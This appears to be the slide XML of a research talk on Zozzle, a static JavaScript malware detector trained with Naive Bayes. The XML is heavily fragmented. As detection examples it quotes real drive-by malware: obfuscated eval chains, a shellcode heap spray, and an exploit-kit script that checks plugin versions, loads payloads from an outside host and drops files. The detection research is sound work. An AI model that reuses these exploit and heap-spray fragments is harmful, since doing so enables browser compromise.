              <a:off x="990601" y="3429000"/>
              <a:ext cx="3962400" cy="1752600"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -69140"/>
                <a:gd name="adj2" fmla="val 4065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6" y="3543300"/>
              <a:ext cx="3676650" cy="152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22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Zozzle: Static Malware Detection Plan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Train </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>classifier </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>recognize </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>alware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Start with thousands of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>benign</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t> labeled samples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Classify JavaScript code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ular Callout 22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OlOlll=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"(x)"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 String"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OlllOO=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"tion"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OlOllO=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"Code(x)}"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OllOOO=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"Char"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OlllOl=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"func"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 l = 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OllOOl=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".from"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"{return"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"var"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(Olllll+OllllO+OlllOl+OlllOO+OlOlll+OllOll+OllOlO+OllOOl+OllOOO+OlOllO);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Obfuscation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648200" y="1600201"/>
            <a:ext cx="4038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String.fromCharCode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(x);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3429000"/>
            <a:ext cx="4191000" cy="3124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shellcode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"%u54EB%u758B…"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"%u0c0c%u0c0c"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bigblock.length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+=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block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bigblock.substring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bigblock.length-slackspace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block.length+slackspace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0x40000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block = block + block +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fillblock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memory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Array(); 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(x=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 x&lt;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300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 x++)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memory[x] = block + shellcode; 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10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105400" y="2514600"/>
            <a:ext cx="4038600" cy="838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O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(m){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String.fromCharCode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Math.floor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(m / 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10000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/ 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1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486400"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangular Callout 6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l(79)+l(61)+l(102)+l(117)+l(110)+l(99)+l(116)+l(105)+l(111)+l(110)+l(40)+l(109)+l(41)+l(123)+l(114)+l(101)+l(116)+l(117)+l(114)+l(110)+l(32)+l(83)+l(116)+l(114)+l(105)+l(110)+l(103)+l(46)+l(102)+l(114)+l(111)+l(109)+l(67)+l(104)+l(97)+l(114)+l(67)+l(111)+l(100)+l(101)+l(40)+l(77)+l(97)+l(116)+l(104)+l(46)+l(102)+l(108)+l(111)+l(111)+l(114)+l(40)+l(109)+l(47)+l(49)+l(48)+l(48)+l(48)+l(48)+l(41)+l(47)+l(50)+l(41)+l(59)+l(125));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1" grpId="0" build="p"/>
      <p:bldP spid="13" grpId="0" build="p"/>
      <p:bldP spid="8" grpId="0" build="p"/>
      <p:bldP spid="7" grpId="0" animBg="1"/>
      <p:bldP spid="7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10800000">
            <a:off x="3393473" y="4536265"/>
            <a:ext cx="28956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Runtime </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Deobfuscation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> via Code Unfolding)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1047750" y="2164749"/>
            <a:ext cx="2209800" cy="2838032"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -20833"/>
              <a:gd name="adj2" fmla="val 56794"/>
            </a:avLst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0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10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778" y="5201728"/>
            <a:ext cx="741872" cy="741872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6439414" y="2821765"/>
            <a:ext cx="1713986" cy="22098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JavaScript runtime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in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browser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46438" y="3040840"/>
            <a:ext cx="1752600" cy="762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Deobfuscator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93473" y="3202765"/>
            <a:ext cx="4572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829814" y="3202765"/>
            <a:ext cx="4572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6959" y="2431240"/>
            <a:ext cx="2077479" cy="2421748"/>
            <a:chOff x="3127288" y="4106474"/>
            <a:chExt cx="2077479" cy="2421748"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="96" name="Rectangular Callout 95"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3127288" y="4106474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7" name="Rectangular Callout 96"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4252267" y="4106474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8" name="Rectangular Callout 97"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3127288" y="5499731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9" name="Rectangular Callout 98"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4252267" y="5499731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16459" y="2073626"/>
            <a:ext cx="2342120" cy="3020277"/>
            <a:chOff x="3590410" y="3057525"/>
            <a:chExt cx="2342120" cy="3020277"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="100" name="Group 99"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4807551" y="3057525"/>
              <a:ext cx="1124979" cy="1393257"/>
              <a:chOff x="3200400" y="4048125"/>
              <a:chExt cx="2077479" cy="2421748"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="101" name="Rectangular Callout 100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2" name="Rectangular Callout 101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3" name="Rectangular Callout 102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4" name="Rectangular Callout 103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3590410" y="3086100"/>
              <a:ext cx="1124979" cy="1393257"/>
              <a:chOff x="3200400" y="4048125"/>
              <a:chExt cx="2077479" cy="2421748"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="106" name="Rectangular Callout 105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7" name="Rectangular Callout 106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8" name="Rectangular Callout 107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9" name="Rectangular Callout 108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3590410" y="4684545"/>
              <a:ext cx="1124979" cy="1393257"/>
              <a:chOff x="3200400" y="4048125"/>
              <a:chExt cx="2077479" cy="2421748"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="111" name="Rectangular Callout 110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2" name="Rectangular Callout 111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3" name="Rectangular Callout 112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4" name="Rectangular Callout 113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4800600" y="4684545"/>
              <a:ext cx="1124979" cy="1393257"/>
              <a:chOff x="3200400" y="4048125"/>
              <a:chExt cx="2077479" cy="2421748"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="116" name="Rectangular Callout 115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7" name="Rectangular Callout 116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8" name="Rectangular Callout 117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9" name="Rectangular Callout 118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26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Zozzle Training &amp; Application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72287" y="5093656"/>
            <a:ext cx="1676786" cy="1764344"/>
            <a:chOff x="5410200" y="956449"/>
            <a:chExt cx="3604923" cy="2842010"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="Picture 5" descr="http://www.applewooddata.co.uk/Images/Server%20Farm%20front%20Veiw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956449"/>
              <a:ext cx="2988313" cy="209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http://userlogos.org/files/logos/Rog/bing.com_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872" y="2461350"/>
              <a:ext cx="2111251" cy="133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ts1.mm.bing.net/images/thumbnail.aspx?q=958006756880&amp;id=03630b615590ca612b2c56d882091a27&amp;url=http%3a%2f%2fwww.techmagnews.com%2fwp-content%2fuploads%2fimages%2fFacebook_No_Longer_Supports_Internet_Explorer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35" y="5232076"/>
            <a:ext cx="945649" cy="10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28800" y="1634244"/>
            <a:ext cx="2914476" cy="1876530"/>
            <a:chOff x="1828800" y="1634244"/>
            <a:chExt cx="2914476" cy="1876530"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2052" name="Picture 4" descr="http://www.asia.ru/images/target/photo/51643579/Watering_Ca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1178">
              <a:off x="2870759" y="2190608"/>
              <a:ext cx="1872517" cy="132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28800" y="1634244"/>
              <a:ext cx="1238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malicious samples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(1K)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50024" y="1604435"/>
            <a:ext cx="2941426" cy="1758113"/>
            <a:chOff x="4850024" y="1604435"/>
            <a:chExt cx="2941426" cy="1758113"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2050" name="Picture 2" descr="http://t1.gstatic.com/images?q=tbn:ANd9GcSN9DPnh2MvOKNOVH4jP7D4bOiGgiIgZvfuxghPcqjs06oWZwW1O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3238">
              <a:off x="4850024" y="1752600"/>
              <a:ext cx="1826394" cy="1609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553200" y="1604435"/>
              <a:ext cx="1238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benign samples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(7K)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76600" y="3709797"/>
            <a:ext cx="2743200" cy="1232579"/>
            <a:chOff x="3276600" y="3709797"/>
            <a:chExt cx="2743200" cy="123257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709797"/>
              <a:ext cx="1778288" cy="1232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437" y="3790269"/>
              <a:ext cx="899363" cy="10716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44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Hierarchical Feature </a:t>
            </a:r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24</a:t>
            </a:fld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094205" y="2054809"/>
            <a:ext cx="10668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91200" y="3047468"/>
            <a:ext cx="10668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loop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60722" y="4112209"/>
            <a:ext cx="1225378" cy="6096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shellcode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825578" y="300936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endParaRPr lang="en-US" sz="14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11096" y="4112209"/>
            <a:ext cx="10668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string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90800" y="5102809"/>
            <a:ext cx="1450889" cy="6096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%u0c0c%u0909…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23" name="Straight Arrow Connector 22"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="17" idx="2"/>
            <a:endCxn id="20" idx="6"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3511378" y="2664409"/>
            <a:ext cx="1116227" cy="6878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1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4627605" y="2664409"/>
            <a:ext cx="1163595" cy="6878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3"/>
            <a:endCxn id="19" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2473411" y="3594735"/>
            <a:ext cx="452600" cy="5174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5"/>
            <a:endCxn id="21" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3410945" y="3594735"/>
            <a:ext cx="433551" cy="5174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2"/>
            <a:endCxn id="22" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3316245" y="4721809"/>
            <a:ext cx="52825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419600" y="5102809"/>
            <a:ext cx="1225378" cy="6096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memory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1700" y="4036009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endParaRPr lang="en-US" sz="14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0" name="Straight Arrow Connector 29"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="18" idx="2"/>
            <a:endCxn id="29" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6324600" y="3657068"/>
            <a:ext cx="0" cy="3789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9" idx="3"/>
            <a:endCxn id="28" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5032289" y="4621376"/>
            <a:ext cx="1049844" cy="4814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7392246" y="5102809"/>
            <a:ext cx="1225378" cy="609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block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3" name="Straight Arrow Connector 32"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="29" idx="5"/>
            <a:endCxn id="32" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6567067" y="4621376"/>
            <a:ext cx="1437868" cy="4814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ular Callout 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3048451"/>
            <a:ext cx="2339803" cy="365074"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 26056"/>
              <a:gd name="adj2" fmla="val 1146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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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unction:shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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ular Callout 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2434820" y="4060430"/>
            <a:ext cx="2346730" cy="365074"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -8256"/>
              <a:gd name="adj2" fmla="val 230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string:%u0c0c%u0909…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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ular Callout 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5975445" y="6169609"/>
            <a:ext cx="1524000" cy="365074"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -104548"/>
              <a:gd name="adj2" fmla="val -1684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loop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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:memory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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8" grpId="0" animBg="1"/>
      <p:bldP spid="29" grpId="0" animBg="1"/>
      <p:bldP spid="56" grpId="0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Naïve Bayes </a:t>
            </a:r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25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4728273" y="2131905"/>
            <a:ext cx="3876675" cy="3313671"/>
            <a:chOff x="5067300" y="2629929"/>
            <a:chExt cx="3876675" cy="3313671"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="63" name="Oval 62"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6058801" y="3857625"/>
              <a:ext cx="550648" cy="550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144526" y="3921001"/>
              <a:ext cx="342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*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5067300" y="2629929"/>
              <a:ext cx="1181100" cy="11038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067557" y="3048451"/>
              <a:ext cx="1076969" cy="800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5067557" y="3413525"/>
              <a:ext cx="991244" cy="5198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5067557" y="3733800"/>
              <a:ext cx="939371" cy="2972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067557" y="4132949"/>
              <a:ext cx="93937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5067557" y="4242967"/>
              <a:ext cx="939371" cy="2628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5067557" y="4326176"/>
              <a:ext cx="991244" cy="5506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5067557" y="4425458"/>
              <a:ext cx="1076969" cy="8395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5067557" y="4483683"/>
              <a:ext cx="1180843" cy="10789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067557" y="4533900"/>
              <a:ext cx="1266568" cy="1409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6656928" y="4132949"/>
              <a:ext cx="4528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115175" y="3882444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P(malicious)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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7407"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="990600" y="1788160"/>
          <a:ext cx="3525538" cy="4079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45186"/>
                <a:gridCol w="1380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P(malicious)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string:0c0c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function:shellcode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loop:memory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Function:ActiveX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try:activex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if:msie</a:t>
                      </a:r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 7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function:Array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function:unescape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loop:+=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loop:nop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6" name="Rectangular Callout 95"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6317901" y="1540202"/>
            <a:ext cx="968578" cy="1143638"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -64937"/>
              <a:gd name="adj2" fmla="val 105542"/>
            </a:avLst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4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400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ke-msn-manu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ke-msn-aut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5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Features &amp; Throughput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8" y="2133600"/>
            <a:ext cx="8598222" cy="327659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03" y="1371600"/>
            <a:ext cx="6557597" cy="5089479"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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642582" y="5562600"/>
            <a:ext cx="8229600" cy="700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1 MB of JavaScript code a second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04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False Positives &amp; False Negatives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52516" y="1600200"/>
            <a:ext cx="5909182" cy="990600"/>
            <a:chOff x="1652516" y="2286000"/>
            <a:chExt cx="5909182" cy="990600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rounded Rectangle 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1652516" y="2286000"/>
              <a:ext cx="2690884" cy="990600"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="0070C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Set of 10,000 samples</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2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99304" y="2550467"/>
              <a:ext cx="2462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0 false positives</a:t>
              </a:r>
              <a:endParaRPr lang="en-US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34618" y="1524000"/>
            <a:ext cx="5909182" cy="990600"/>
            <a:chOff x="1652516" y="2286000"/>
            <a:chExt cx="5909182" cy="990600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rounded Rectangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1652516" y="2286000"/>
              <a:ext cx="2690884" cy="990600"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="0070C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Set of 1.2M samples</a:t>
              </a:r>
              <a:endParaRPr lang="en-US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9304" y="2550467"/>
              <a:ext cx="2462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4 false positives</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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373982"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="762000" y="3886200"/>
          <a:ext cx="3886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504589"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5099304" y="3886200"/>
          <a:ext cx="381609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ular Callout 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="2819400"/>
            <a:ext cx="3810000" cy="2209800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 48361"/>
              <a:gd name="adj2" fmla="val 8429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Finds more malware than any other detector we know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69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7" grpId="0">
        <p:bldAsOne/>
      </p:bldGraphic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Drive-by Malware Detection Landscape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4191000"/>
            <a:ext cx="83058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72000" y="1524000"/>
            <a:ext cx="0" cy="45720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78952" y="3429000"/>
            <a:ext cx="1549848" cy="1499175"/>
            <a:chOff x="838200" y="2895600"/>
            <a:chExt cx="1549848" cy="1499175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2895600"/>
              <a:ext cx="1549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>
                      <a:lumMod val="65000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>runtime</a:t>
              </a:r>
              <a:endParaRPr lang="en-US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8200" y="3810000"/>
              <a:ext cx="1095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>
                      <a:lumMod val="65000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>static</a:t>
              </a:r>
              <a:endParaRPr lang="en-US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36138" y="1263092"/>
            <a:ext cx="17508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online</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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(browser-based)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31" y="1263092"/>
            <a:ext cx="19118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ffline</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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  (honey-monkey)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6321" y="2207947"/>
            <a:ext cx="2148345" cy="1462217"/>
            <a:chOff x="6805615" y="2588062"/>
            <a:chExt cx="2148345" cy="1462217"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Oval 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7655176" y="2588062"/>
              <a:ext cx="449225" cy="4492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68238" y="3198167"/>
              <a:ext cx="1023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Nozzle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05615" y="3680947"/>
              <a:ext cx="2148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[Usenix Security ’09]</a:t>
              </a:r>
              <a:endParaRPr lang="en-US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6320" y="4114800"/>
            <a:ext cx="2148345" cy="1462217"/>
            <a:chOff x="6805616" y="2588062"/>
            <a:chExt cx="2148345" cy="1462217"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Oval 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7655176" y="2588062"/>
              <a:ext cx="449225" cy="449225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97444" y="3198167"/>
              <a:ext cx="964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Z</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>ozzle</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="24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05616" y="3680947"/>
              <a:ext cx="2148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[Usenix Security ’11]</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rounded Rectangular Callout 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4777882" y="2395827"/>
            <a:ext cx="3235116" cy="1306113"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -125200"/>
              <a:gd name="adj2" fmla="val -47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Instrumented browser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Looks for heap sprays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Moderately high overhead</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rounded Rectangular Callout 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4762500" y="4343400"/>
            <a:ext cx="3235116" cy="1306113"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -125155"/>
              <a:gd name="adj2" fmla="val -4525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Mostly static detection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Low overhead, high reach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Can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> be deployed in browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rounded Rectangular Callout 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5651851" y="1249641"/>
            <a:ext cx="3235116" cy="1306113"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -13783"/>
              <a:gd name="adj2" fmla="val 1616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Detection more immediate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gap between what client and server can see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0629E-6 L 0.53125 2.0629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 animBg="1"/>
      <p:bldP spid="28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457200"/>
            <a:ext cx="8153400" cy="5324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document.write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'&lt;div style="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position:absolute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; left:-1000px; top:-1000px;"&gt;'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E5Jrh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null;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E5Jrh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new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ActiveXObject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"AcroPDF.PDF"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E5Jrh)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E5Jrh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new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ActiveXObject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PDF.PdfCtrl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(E5Jrh)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lv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E5Jrh.GetVersions().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0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split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","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)[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4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].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0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split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"="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)[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].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0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replace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(/\./g,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(lv &lt;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900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&amp;&amp; lv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813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document.write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'&lt;embed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src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="http://rodenborn.com/images/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validate.php?s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PTqrUdHv&amp;id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=2" width=100 height=100 type="application/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pdf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"&gt;&lt;/embed&gt;'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E5Jrh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E5Jrh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(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new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ActiveXObject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"ShockwaveFlash.ShockwaveFlash.9"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)).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GetVariable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"$"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"version"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).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0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split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","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(E5Jrh &amp;&amp; E5Jrh[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2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] &lt;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124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document.write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'&lt;object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classid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="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width=100 height=100 align=middle&gt;&lt;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param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name="movie" value="http://rodenborn.com/images/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validate.php?s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PTqrUdHv&amp;id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=3"/&gt;&lt;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param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name="quality" value="high"/&gt;&lt;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param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name="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bgcolor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 value="#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ffffff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"/&gt;&lt;embed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src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="http://rodenborn.com/images/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validate.php?s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PTqrUdHv&amp;id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=3"/&gt;&lt;/embed&gt;&lt;/object&gt;'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function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b6(t)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c1,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c2,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c3,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e1,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e2,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e3,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e4,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j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k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"+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TYArsQ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=z21hD9o3pNUaXdBqSOWEL/VeG8u6PiKR0fMtvkjl4xyCw7mgI5cbnJHZF"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do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e1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k.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indexOf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t.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charAt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(j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e2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k.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indexOf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t.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charAt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(j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e3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k.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indexOf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t.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charAt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(j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e4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k.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indexOf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t.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charAt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(j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c1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e1 &lt;&lt;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2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| e2 &gt;&gt;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4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c2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(e2 &amp;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15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 &lt;&lt;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4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| e3 &gt;&gt;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2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c3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(e3 &amp;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3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 &lt;&lt;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6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| e4;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String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fromCharCode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(c1);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(e3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64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String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fromCharCode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(c2);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(e4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64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String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.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fromCharCode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(c3)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while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(j &lt;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t.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0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length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return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document.write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"&lt;script language=VBScript&gt;Sub s1(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e,fn,dt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):On Error Resume Next:s1=0:"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"Set k=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e.CreateTextFile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fn,TRUE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):if Err&gt;0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then:Exit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Function:End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if:"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'b="":For j=1 To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LenB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dt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):b=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b&amp;ChrW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Asc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(Mid(dt,j,1))):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Next:k.Write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(b):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k.Close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:'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"if Err&gt;0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then:Exit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Function:End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if:s1=1:End Sub&lt;/script&gt;"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function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f1(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c,o,n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(c)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return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c;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r,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a,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b,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d,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f,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g,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h;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r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null;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a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"try{r=o."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CreateObject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(n"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")}catch(e){"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GetObject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("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g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',""'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 err="1">
                <a:solidFill>
                  <a:srgbClr val="0000AA"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eval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(a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'"",n'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"n"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"n"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"}}}}}}"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return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r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function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f4(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d[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d.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0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length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]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c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function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f2(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o,t,n,d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for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i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n.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0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length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-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 i &gt;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 i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--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(o)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o.Type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2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o.Mode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3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o.Open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o.Charset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"ISO-8859-1"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o.WriteText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(d);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o.SaveToFile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(n[i],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2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o.Close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return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n[i]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(t &amp;&amp; window.s1 &amp;&amp; s1(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t,n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[i],d))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return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n[i]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return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function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f3()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i,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m,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t,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v1,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v2,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v3,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v4,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d1,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d2,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r,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d,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t,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f,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x,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s,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c,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b,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g,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h,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j,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k,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n,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p,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q;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a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null;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"BD96C556-65A3-11D0-983A-00C04FC29E3"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"-0000-0000-C000-000000000046"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t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[m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"0"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"6"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"AB9BCEDD-EC7E-47E1-9322-D4A210617116"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"0006F033"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"0006F03A"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"6e32070a-766d-4ee6-879c-dc1fa91d2fc3"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"6414512B-B978-451D-A0D8-FCFDF33E833C"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"7F5B7F63-F06F-4331-8A26-339E03C0AE3D"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"06723E09-F4C2-43c8-8358-09FCD1DB0766"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"639F725F-1B2D-4831-A9FD-874847682010"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"BA018599-1DB3-44f9-83B4-461454C84BF8"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"D0C07D56-7C69-43F1-B4A0-25F5A11FAB19"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"E8CCCDDF-CA28-496b-B050-6C07C962476B"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,a];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v1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v2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v